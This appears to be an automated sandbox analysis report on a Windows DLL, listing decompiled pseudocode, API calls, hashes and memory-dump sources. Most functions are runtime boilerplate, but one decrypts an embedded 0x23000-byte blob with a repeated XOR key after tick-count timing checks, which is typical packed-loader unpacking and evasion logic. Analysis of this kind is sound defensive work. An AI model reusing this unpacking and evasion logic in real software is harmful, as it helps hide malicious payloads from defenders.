                          • Opcode Fuzzy Hash: 1713bb399cf92f508ecbbc33bff30b82480a5719b9a47477d352eec20cf4a702
                          • Instruction Fuzzy Hash: 02E1FF31A083068FCB50CFA9C880B1AB7F0FF99704F15496EEA558B345D772E855CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BA21B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E6E4BA21B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;
				void* _t89;

				_t89 = __fp0;
				_t68 = __edx;
				_push(0x10);
				_push(0x6e4f7d80);
				E6E4BAC90(__ebx, __edi, __esi);
				_t34 =  *0x6e4fae14; // 0x0
				if(_t34 > 0) {
					 *0x6e4fae14 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6E4BA872();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6e4fb158 - 2;
					if( *0x6e4fb158 != 2) {
						E6E4BAB0C(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6e4f7da8);
						E6E4BAC90(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6E4BA3D6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6E4BA0C1(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t42 = E6E4A1290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t72); // executed
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6E4A1290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E4BA21B(_t58, _t68, _t72, _t76, _t25, _t89);
											_pop(_t61);
											E6E4BA3D6( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6E4BA0C1(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6E4BA3D6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6e4fae14 - _t72; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6E4BA93D(__ebx, _t61, 1, __esi);
						E6E4BA7F9();
						E6E4BAC5B();
						 *0x6e4fb158 =  *0x6e4fb158 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6E4BA2B0();
						_t54 = E6E4BAADE(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6E4BA2BD();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}


















                          0x6e4ba21b
                          0x6e4ba21b
                          0x6e4ba21b
                          0x6e4ba21d
                          0x6e4ba222
                          0x6e4ba227
                          0x6e4ba22e
                          0x6e4ba235
                          0x6e4ba23d
                          0x6e4ba240
                          0x6e4ba249
                          0x6e4ba24c
                          0x6e4ba24f
                          0x6e4ba256
                          0x6e4ba2c5
                          0x6e4ba2ca
                          0x6e4ba2cb
                          0x6e4ba2cd
                          0x6e4ba2d2
                          0x6e4ba2d7
                          0x6e4ba2da
                          0x6e4ba2dc
                          0x6e4ba2ed
                          0x6e4ba2ed
                          0x6e4ba2f1
                          0x6e4ba2f4
                          0x6e4ba300
                          0x6e4ba300
                          0x6e4ba30d
                          0x6e4ba30f
                          0x6e4ba312
                          0x6e4ba314
                          0x6e4ba31f
                          0x6e4ba324
                          0x6e4ba326
                          0x6e4ba329
                          0x6e4ba32b
                          0x00000000
                          0x00000000
                          0x6e4ba32b
                          0x6e4ba2f6
                          0x6e4ba2f6
                          0x6e4ba2f9
                          0x00000000
                          0x6e4ba2fb
                          0x6e4ba2fb
                          0x6e4ba331
                          0x6e4ba331
                          0x6e4ba336
                          0x6e4ba33b
                          0x6e4ba33d
                          0x6e4ba340
                          0x6e4ba343
                          0x6e4ba345
                          0x6e4ba347
                          0x6e4ba349
                          0x6e4ba34e
                          0x6e4ba353
                          0x6e4ba355
                          0x6e4ba355
                          0x6e4ba35b
                          0x6e4ba35c
                          0x6e4ba361
                          0x6e4ba367
                          0x6e4ba367
                          0x6e4ba347
                          0x6e4ba36c
                          0x6e4ba36e
                          0x6e4ba375
                          0x6e4ba37f
                          0x6e4ba381
                          0x6e4ba384
                          0x6e4ba386
                          0x6e4ba392
                          0x6e4ba3ba
                          0x6e4ba3ba
                          0x6e4ba370
                          0x6e4ba370
                          0x6e4ba373
                          0x00000000
                          0x00000000
                          0x6e4ba373
                          0x6e4ba36e
                          0x6e4ba2f9
                          0x6e4ba3bd
                          0x6e4ba3c4
                          0x6e4ba2de
                          0x6e4ba2de
                          0x6e4ba2e4
                          0x00000000
                          0x6e4ba2e6
                          0x6e4ba2e6
                          0x6e4ba2e6
                          0x6e4ba2e4
                          0x6e4ba3c9
                          0x6e4ba3d5
                          0x6e4ba258
                          0x6e4ba258
                          0x6e4ba25d
                          0x6e4ba262
                          0x6e4ba267
                          0x6e4ba26e
                          0x6e4ba272
                          0x6e4ba27c
                          0x6e4ba288
                          0x6e4ba28a
                          0x6e4ba28a
                          0x6e4ba28c
                          0x6e4ba28f
                          0x6e4ba296
                          0x6e4ba29b
                          0x00000000
                          0x6e4ba29b
                          0x6e4ba230
                          0x6e4ba230
                          0x6e4ba29d
                          0x6e4ba2a0
                          0x6e4ba2ac
                          0x6e4ba2ac

                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6E4BA262
                          • ___scrt_uninitialize_crt.LIBCMT ref: 6E4BA27C
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: 86f2c15919145d9a48aaebf59122609adf4b6841ce0831ff1753c52400d897c3
                          • Instruction ID: 7308b9b2ffb2d0f7b98c7b35ea13e7f6db2ccfe5caf0fa4278444f29f1c5d392
                          • Opcode Fuzzy Hash: 86f2c15919145d9a48aaebf59122609adf4b6841ce0831ff1753c52400d897c3
                          • Instruction Fuzzy Hash: 8C41BE72D04614ABDB118FF8C800FAE3AB9EF81B94F00491BE81566340D3718952BBF0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BA2CB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E6E4BA2CB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;
				void* _t53;

				_t53 = __fp0;
				_t40 = __edx;
				_push(0xc);
				_push(0x6e4f7da8);
				E6E4BAC90(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6E4BA3D6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6E4BA0C1(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t26 = E6E4A1290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t42); // executed
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6E4A1290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6E4BA21B(_t35, _t40, _t42, _t45, _t14, _t53);
								_pop(_t37);
								E6E4BA3D6( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6E4BA0C1(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6E4BA3D6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6e4fae14 - _t42; // 0x0
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}















                          0x6e4ba2cb
                          0x6e4ba2cb
                          0x6e4ba2cb
                          0x6e4ba2cd
                          0x6e4ba2d2
                          0x6e4ba2d7
                          0x6e4ba2dc
                          0x6e4ba2ed
                          0x6e4ba2ed
                          0x6e4ba2f1
                          0x6e4ba2f4
                          0x6e4ba300
                          0x6e4ba300
                          0x6e4ba30d
                          0x6e4ba30f
                          0x6e4ba312
                          0x6e4ba314
                          0x6e4ba3bd
                          0x6e4ba3bd
                          0x6e4ba3c4
                          0x6e4ba3c6
                          0x6e4ba3c9
                          0x6e4ba3d5
                          0x6e4ba3d5
                          0x6e4ba31f
                          0x6e4ba324
                          0x6e4ba326
                          0x6e4ba329
                          0x6e4ba32b
                          0x00000000
                          0x00000000
                          0x6e4ba331
                          0x6e4ba331
                          0x6e4ba336
                          0x6e4ba33b
                          0x6e4ba33d
                          0x6e4ba340
                          0x6e4ba343
                          0x6e4ba345
                          0x6e4ba347
                          0x6e4ba349
                          0x6e4ba34e
                          0x6e4ba353
                          0x6e4ba355
                          0x6e4ba355
                          0x6e4ba35b
                          0x6e4ba35c
                          0x6e4ba361
                          0x6e4ba367
                          0x6e4ba367
                          0x6e4ba347
                          0x6e4ba36c
                          0x6e4ba36e
                          0x6e4ba375
                          0x6e4ba37f
                          0x6e4ba381
                          0x6e4ba384
                          0x6e4ba386
                          0x6e4ba392
                          0x6e4ba3ba
                          0x6e4ba3ba
                          0x00000000
                          0x6e4ba370
                          0x6e4ba370
                          0x6e4ba373
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ba373
                          0x6e4ba36e
                          0x6e4ba2f6
                          0x6e4ba2f9
                          0x00000000
                          0x00000000
                          0x6e4ba2fb
                          0x00000000
                          0x6e4ba2fb
                          0x6e4ba2de
                          0x6e4ba2e4
                          0x00000000
                          0x00000000
                          0x6e4ba2e6
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: b11f3bef7f0f812b0f5861c2940487cd785ff14acfb5e19bc2e2fa73b74e0ec1
                          • Instruction ID: 28860cd270853e3ba620cd95c2aa56ae648d3599bfeb63c3c22f4bd9776bf63b
                          • Opcode Fuzzy Hash: b11f3bef7f0f812b0f5861c2940487cd785ff14acfb5e19bc2e2fa73b74e0ec1
                          • Instruction Fuzzy Hash: 1D217A72D00619ABDB618EF9C840EAF3A6AEF81B94B01451BEC2567310D3318D52ABF0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC460, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4AC460() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WakeByAddressSingle");
				}
			}




                          0x6e4ac465
                          0x6e4ac46d
                          0x6e4ac47c
                          0x6e4ac46f
                          0x6e4ac47b
                          0x6e4ac47b

                          APIs
                          • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6E4AC465
                          • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6E4AC475
                          Strings
                          • api-ms-win-core-synch-l1-2-0, xrefs: 6E4AC460
                          • WakeByAddressSingle, xrefs: 6E4AC46F
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1731903895
                          • Opcode ID: 5d1b83b3718c5a7d82fcd5b2a2aad43bd6c7d2abcbe721b0d378e79cdff15022
                          • Instruction ID: 9ad47f78d6ecf7ac2e89fec8cb5c5bb77c154cdb91241444ea9d4d1096ce0d80
                          • Opcode Fuzzy Hash: 5d1b83b3718c5a7d82fcd5b2a2aad43bd6c7d2abcbe721b0d378e79cdff15022
                          • Instruction Fuzzy Hash: AEB012B564894167DED4FFF35D0CE173928ABDEA2770245967292DF681CA20D000ED31
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC4E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E4AC4E0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WaitOnAddress");
				}
			}




                          0x6e4ac4e5
                          0x6e4ac4ed
                          0x6e4ac4fc
                          0x6e4ac4ef
                          0x6e4ac4fb
                          0x6e4ac4fb

                          APIs
                          • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6E4AC4E5
                          • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6E4AC4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1891578837
                          • Opcode ID: a5ed7c405bb12941112bbfc4b08a2e05dc7fa5365419138a745102b498fb9564
                          • Instruction ID: 53b62131f264cbc3224e6bdd70579db2e34ad254ab2453d784bb33e248da684c
                          • Opcode Fuzzy Hash: a5ed7c405bb12941112bbfc4b08a2e05dc7fa5365419138a745102b498fb9564
                          • Instruction Fuzzy Hash: B8B09275608942669EA4BEF35D0CE263928ABA9A2B70285566552EA685CA20E000AD21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A1290, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 136memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E6E4A1290(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				char _v112;
				void* __ebp;
				intOrPtr _t60;
				void* _t63;
				void* _t64;
				signed int _t68;
				signed int _t69;
				signed char _t73;
				intOrPtr _t75;
				signed int _t76;
				void* _t88;
				void* _t89;
				signed int _t93;
				signed int _t94;
				void* _t108;
				void* _t109;
				intOrPtr _t111;
				intOrPtr _t114;
				signed int _t116;
				intOrPtr _t118;

				_t106 = __edi;
				_t86 = __ebx;
				_push(__ebx);
				_push(__edi);
				_t118 = (_t116 & 0xfffffff0) - 0x70;
				_t111 = _t118;
				 *((intOrPtr*)(_t111 + 0x58)) = _t114;
				 *((intOrPtr*)(_t111 + 0x5c)) = _t118;
				 *(_t111 + 0x68) = 0xffffffff;
				 *((intOrPtr*)(_t111 + 0x64)) = E6E4B3B10;
				_t124 = _a8 - 1;
				 *((intOrPtr*)(_t111 + 0x60)) =  *[fs:0x0];
				 *[fs:0x0] = _t111 + 0x60;
				if(_a8 != 1) {
					L14:
					_t60 =  *((intOrPtr*)(_t111 + 0x60));
					 *[fs:0x0] = _t60;
					return _t60;
				} else {
					asm("movaps xmm1, [0x6e4c81d0]");
					asm("xorps xmm0, xmm0");
					asm("movaps [esi+0x30], xmm0");
					 *((intOrPtr*)(_t111 + 0x40)) = _a4;
					 *(_t111 + 0x44) = 0;
					asm("movups [esi+0x48], xmm1");
					E6E4B97A0(_t124, __fp0);
					 *((intOrPtr*)(_t111 + 0x23)) = 0xf8db84f8;
					 *((intOrPtr*)(_t111 + 0x27)) = 0x392538df;
					 *((intOrPtr*)(_t111 + 0x2b)) = 0x7048fbd1;
					 *((intOrPtr*)(_t111 + 0x14)) = 0x9e9e1da7;
					 *((intOrPtr*)(_t111 + 0x18)) = 0xe0e4bd1f;
					 *((intOrPtr*)(_t111 + 0x1c)) = 0x794c6027;
					 *((short*)(_t111 + 0x20)) = 0x7ccf;
					 *((char*)(_t111 + 0x2f)) = 0x17;
					 *((char*)(_t111 + 0x22)) = 0x5e;
					_t63 =  *0x6e4fadc8; // 0xb00000
					if(_t63 != 0) {
						L4:
						_t64 = HeapAlloc(_t63, 0, 0x23000); // executed
						if(_t64 == 0) {
							goto L15;
						} else {
							 *(_t111 + 0xc) = _t64;
							E6E4BAE10(_t64, 0x6e4c8220, 0x23000);
							_t68 = 0;
							asm("o16 nop [cs:eax+eax]");
							do {
								_t108 = 0xfffdd000;
								_t88 = _t111 + 0x14;
								_t93 = 0;
								 *((intOrPtr*)(_t111 + 0x10)) = _t68;
								do {
									_t69 = _t93;
									_t93 = _t93 + 1;
									_t73 =  *(_t88 + (_t69 * 0x88888889 >> 0x20 >> 3) - (0x88888889 << 4)) & 0x000000ff;
									_t88 = _t88 + 1;
									 *( *(_t111 + 0xc) + _t108 + 0x23000) =  *( *(_t111 + 0xc) + _t108 + 0x23000) ^ _t73;
									_t108 = _t108 + 1;
								} while (_t108 != 0);
								_t68 =  *((intOrPtr*)(_t111 + 0x10)) + 1;
							} while (_t68 != 0x3e9);
							_t89 =  *(_t111 + 0xc);
							_t75 = 0;
							asm("o16 nop [cs:eax+eax]");
							do {
								_t109 = 0xfffdd000;
								_t94 = 0;
								 *((intOrPtr*)(_t111 + 0x10)) = _t75;
								asm("o16 nop [eax+eax]");
								do {
									_t76 = _t94;
									_t94 = _t94 + 1;
									 *(_t89 + _t109 + 0x23000) =  *(_t89 + _t109 + 0x23000) ^  *(_t109 + _t111 + 0x23 + (_t76 * 0x4ec4ec4f >> 0x20 >> 2) * 0xfffffff3 + 0x23000) & 0x000000ff;
									_t109 = _t109 + 1;
								} while (_t109 != 0);
								_t75 =  *((intOrPtr*)(_t111 + 0x10)) + 1;
								_t132 = _t75 - 0x3e9;
							} while (_t75 != 0x3e9);
							 *(_t111 + 0x68) = 0;
							 *(_t111 + 0x30) =  *(_t111 + 0xc);
							_push(_t111 + 0x30);
							E6E4B9990(_t132);
							HeapFree( *0x6e4fadc8, 0,  *(_t111 + 0xc));
							goto L14;
						}
					} else {
						_t63 = GetProcessHeap();
						if(_t63 == 0) {
							L15:
							E6E4C6C30(_t86, 0x23000, 1, _t106, _t111, __eflags);
							asm("ud2");
							_push(_t114);
							return E6E4A1000( *((intOrPtr*)( &_v112 + 0xc)), 0x23000);
						} else {
							 *0x6e4fadc8 = _t63;
							goto L4;
						}
					}
				}
			}
























                          0x6e4a1290
                          0x6e4a1290
                          0x6e4a1293
                          0x6e4a1294
                          0x6e4a1299
                          0x6e4a129c
                          0x6e4a129e
                          0x6e4a12a4
                          0x6e4a12a7
                          0x6e4a12ae
                          0x6e4a12bf
                          0x6e4a12c2
                          0x6e4a12c5
                          0x6e4a12cc
                          0x6e4a143a
                          0x6e4a143a
                          0x6e4a143d
                          0x6e4a144a
                          0x6e4a12d2
                          0x6e4a12d5
                          0x6e4a12dc
                          0x6e4a12df
                          0x6e4a12e3
                          0x6e4a12e6
                          0x6e4a12ed
                          0x6e4a12f1
                          0x6e4a12f6
                          0x6e4a12fd
                          0x6e4a1304
                          0x6e4a130b
                          0x6e4a1312
                          0x6e4a1319
                          0x6e4a1320
                          0x6e4a1326
                          0x6e4a132a
                          0x6e4a132e
                          0x6e4a1335
                          0x6e4a1349
                          0x6e4a1351
                          0x6e4a1358
                          0x00000000
                          0x6e4a135e
                          0x6e4a1368
                          0x6e4a136c
                          0x6e4a1374
                          0x6e4a1376
                          0x6e4a1380
                          0x6e4a1380
                          0x6e4a1385
                          0x6e4a1388
                          0x6e4a138a
                          0x6e4a1390
                          0x6e4a1390
                          0x6e4a1397
                          0x6e4a13a4
                          0x6e4a13ab
                          0x6e4a13ac
                          0x6e4a13b3
                          0x6e4a13b3
                          0x6e4a13b9
                          0x6e4a13ba
                          0x6e4a13c1
                          0x6e4a13c4
                          0x6e4a13c6
                          0x6e4a13d0
                          0x6e4a13d0
                          0x6e4a13d5
                          0x6e4a13d7
                          0x6e4a13da
                          0x6e4a13e0
                          0x6e4a13e0
                          0x6e4a13e7
                          0x6e4a13fc
                          0x6e4a1403
                          0x6e4a1403
                          0x6e4a1409
                          0x6e4a140a
                          0x6e4a140a
                          0x6e4a1414
                          0x6e4a141b
                          0x6e4a1421
                          0x6e4a1422
                          0x6e4a1435
                          0x00000000
                          0x6e4a1435
                          0x6e4a1337
                          0x6e4a1337
                          0x6e4a133e
                          0x6e4a144d
                          0x6e4a1457
                          0x6e4a145c
                          0x6e4a1460
                          0x6e4a147b
                          0x6e4a1344
                          0x6e4a1344
                          0x00000000
                          0x6e4a1344
                          0x6e4a133e
                          0x6e4a1335

                          APIs
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B97D6
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B97F4
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B980D
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B980F
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B9816
                            • Part of subcall function 6E4B97A0: GetTickCount64.KERNEL32 ref: 6E4B9834
                          • GetProcessHeap.KERNEL32 ref: 6E4A1337
                          • HeapAlloc.KERNEL32(00B00000,00000000,00023000), ref: 6E4A1351
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4A1435
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick$Heap$AllocFreeProcess
                          • String ID: '`Ly
                          • API String ID: 2047189075-560155178
                          • Opcode ID: 64c654ad64672d5d1e7c2a813d5bf266227375016a145ac3d1fa86f44001c53a
                          • Instruction ID: 3357460f67f72b639b1ba7c022e3f58c41265d1aab8560783a4b07821fe0af51
                          • Opcode Fuzzy Hash: 64c654ad64672d5d1e7c2a813d5bf266227375016a145ac3d1fa86f44001c53a
                          • Instruction Fuzzy Hash: E8518974604B408BD3248F79D880F56BBF5FF99318F108A2ED9968BB85E734F5058B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C1AA1, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          C-Code - Quality: 19%
                          			E6E4C1AA1() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t10;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E6E4C1A6A(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E6E4C19B3(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t10 = E6E4BFC29(_t9); // executed
						_t26 = _t10;
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E6E4C19B3() != 0) {
								E6E4C05C3(0);
								_t19 = _t26;
							} else {
								E6E4C05C3(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E6E4C05C3();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}












                          0x6e4c1aa7
                          0x6e4c1aa9
                          0x6e4c1aaf
                          0x6e4c1ab3
                          0x6e4c1abb
                          0x6e4c1ac0
                          0x6e4c1ace
                          0x6e4c1ad1
                          0x6e4c1ad9
                          0x6e4c1ade
                          0x6e4c1aed
                          0x6e4c1af2
                          0x6e4c1af5
                          0x6e4c1af8
                          0x6e4c1b0b
                          0x6e4c1b0c
                          0x6e4c1b0f
                          0x6e4c1b10
                          0x6e4c1b13
                          0x6e4c1b14
                          0x6e4c1b15
                          0x6e4c1b20
                          0x6e4c1b2b
                          0x6e4c1b30
